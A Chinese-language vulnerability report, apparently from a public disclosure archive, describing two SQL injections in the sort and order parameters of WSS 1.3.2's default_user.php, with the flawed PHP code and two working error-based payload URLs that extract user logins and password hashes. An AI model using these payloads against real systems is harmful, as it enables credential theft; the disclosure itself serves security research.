WSS最新版某处SQL注入直接获取数据二（两处）

### 简要描述： WSS最新版某处SQL注入直接获取数据二（两处） ### 详细说明： WSS最新版1.3.2 文件default_user.php ``` <?php require_once('config/tank_config.php'); ?> <?php require_once('session_unset.php'); ?> <?php require_once('session.php'); ?> <?php $url_project = $_SERVER["QUERY_STRING"] ; $current_url = current(explode("&sort",$url_project)); $currentPage = $_SERVER["PHP_SELF"]; $maxRows_Recordset1 = get_item( 'maxrows_user' ); $pageNum_Recordset1 = 0; if (isset($_GET['pageNum_Recordset1'])) { $pageNum_Recordset1 = $_GET['pageNum_Recordset1']; } $startRow_Recordset1 = $pageNum_Recordset1 * $maxRows_Recordset1; $sortlist = "tk_user_registered"; if (isset($_GET['sort'])) { $sortlist = $_GET['sort']; } $orderlist = "DESC"; if (isset($_GET['order'])) { $orderlist= $_GET['order']; } $colrole_Recordset1 = ""; if (isset($_GET['select3'])) { $colrole_Recordset1 = $_GET['select3']; } $colrole_dis = "0"; if (isset($_GET['select1'])) { $colrole_dis = $_GET['select1']; } $colinputtitle_Recordset1 = ""; if (isset($_GET['inputtitle'])) { $colinputtitle_Recordset1 = $_GET['inputtitle']; } mysql_select_db($database_tankdb, $tankdb); $query_Recordset1 = sprintf("SELECT * FROM tk_user WHERE tk_user_rank LIKE %s AND tk_user_rank NOT LIKE %s AND tk_display_name LIKE %s ORDER BY %s %s", GetSQLValueString("%" . $colrole_Recordset1 . "%", "text"), GetSQLValueString("%" . $colrole_dis . "%", "text"), GetSQLValueString("%" . $colinputtitle_Recordset1 . "%", "text"), GetSQLValueString($sortlist, "defined", $sortlist, "NULL"), GetSQLValueString($orderlist, "defined", $orderlist, "NULL")); $query_limit_Recordset1 = sprintf("%s LIMIT %d, %d", $query_Recordset1, $startRow_Recordset1, $maxRows_Recordset1); $Recordset1 = mysql_query($query_limit_Recordset1, $tankdb) or die(mysql_error()); $row_Recordset1 = mysql_fetch_assoc($Recordset1); ``` 这里注入： ``` GetSQLValueString($sortlist, "defined", $sortlist, "NULL"), GetSQLValueString($orderlist, "defined", $orderlist, "NULL")); ``` $sortlist和$orderlist是GET获取的参数通过这里的GetSQLValueString函数处理 我们进入GetSQLValueString函数，function.class.ph： ``` if (!function_exists("GetSQLValueString")) { function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "") { if (PHP_VERSION < 6) { $theValue = get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue; } $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue); switch ($theType) { case "text": $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL"; break; case "long": case "int": $theValue = ($theValue != "") ? intval($theValue) : "NULL"; break; case "double": $theValue = ($theValue != "") ? doubleval($theValue) : "NULL"; break; case "date": $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL"; break; case "defined": $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue; break; } return $theValue; } } ``` 这里对传入的参数进行了处理 但是当$theType为defined的时候，当$theValue不为空时返回$theDefinedValue，当$theValue为空时返回$theNotDefinedValue 所以，从上面的GET获取的参数值即为这里的$theValue 当$theValue不为空时，即返回$theDefinedValue，这里就是$theValue $theValue没有过滤，最后进入SQL，导致SQL注入。。。 这里存在两处SQL注入 第一处为 $sortlist = $_GET['sort']; 第二处为 $orderlist= $_GET['order']; ### 漏洞证明： ``` http://localhost/WSS1.3.2_cn/wss/default_user.php?sort=uid and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(tk_user_login,tk_user_pass) from tk_user limit 0,1))a from information_schema.tables group by a)b)%23 http://localhost/WSS1.3.2_cn/wss/default_user.php?sort=111111&order=uid and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(tk_user_login,tk_user_pass) from tk_user limit 0,1))a from information_schema.tables group by a)b)%23 ``` 原始页面： [<img src="https://images.seebug.org/upload/201411/21165816cfc3eb0a736c8a25f84207e9c669e656.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/21165816cfc3eb0a736c8a25f84207e9c669e656.png) 注入数据： [<img src="https://images.seebug.org/upload/201411/211658379139e0774cf9b9aa71823200ea67c6f2.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/211658379139e0774cf9b9aa71823200ea67c6f2.png)